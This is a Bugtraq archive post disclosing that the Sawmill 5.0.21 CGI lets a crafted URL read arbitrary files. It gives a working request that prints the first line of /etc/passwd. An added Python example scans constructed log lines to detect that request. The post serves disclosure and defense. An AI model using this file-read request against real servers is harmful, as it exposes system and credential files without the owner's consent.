Bugtraq mailing list archives

Re: sawmill5.0.21 path bug


From: lwc () VAPID DHS ORG (Cashdollar, Larry)
Date: Tue, 27 Jun 2000 15:36:45 -0700


Sawmill can also be run as a CGI script. This method is vulnerable as
well.

The following will print the first line of the password file:

http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1

-- Larry Cashdollar
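
A log check for the request shape shown above, as an added example that is not part of the original post: it scans web-server access-log lines for requests to a Sawmill CGI whose query string carries `rfcf` followed by an absolute path. The log lines are constructed, and the combined log format, the match on a script name containing "sawmill", and the function name are assumptions.

```python
import re
from urllib.parse import unquote

# Client address and request target from a combined-log-format line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "rfcf" as a '+'-separated token, followed by an optionally quoted value.
RFCF = re.compile(r'(?:^|\+)rfcf\+"?([^"+]*)')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2000:15:40:01 -0700] "GET /cgi-bin/sawmill5'
    '?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 512',
    '192.0.2.11 - - [27/Jun/2000:15:41:07 -0700] "GET /cgi-bin/sawmill5 HTTP/1.0" 200 2048',
    '192.0.2.12 - - [27/Jun/2000:15:42:19 -0700] "GET /cgi-bin/sawmill5'
    '?rfcf+%22%2Fetc%2Fpasswd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 512',
    '192.0.2.13 - - [27/Jun/2000:15:43:30 -0700] "GET /index.html'
    '?rfcf+%22/etc/passwd%22 HTTP/1.0" 404 0',
    'truncated or malformed line',
]

def find_rfcf_reads(lines):
    """Return (client, path) for Sawmill CGI requests whose rfcf value is an absolute path."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        path, _, query = target.partition("?")
        # Assumption: the CGI's file name contains "sawmill", as in the post's URL.
        if "sawmill" not in path.rsplit("/", 1)[-1].lower():
            continue
        # Percent-decode once so %22 and %2F are compared in their literal form.
        found = RFCF.search(unquote(query))
        if found and found.group(1).startswith("/"):
            hits.append((client, found.group(1)))
    return hits

if __name__ == "__main__":
    for client, path in find_rfcf_reads(SAMPLE_LOG):
        print(f"{client} requested file {path} through the sawmill CGI")
```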
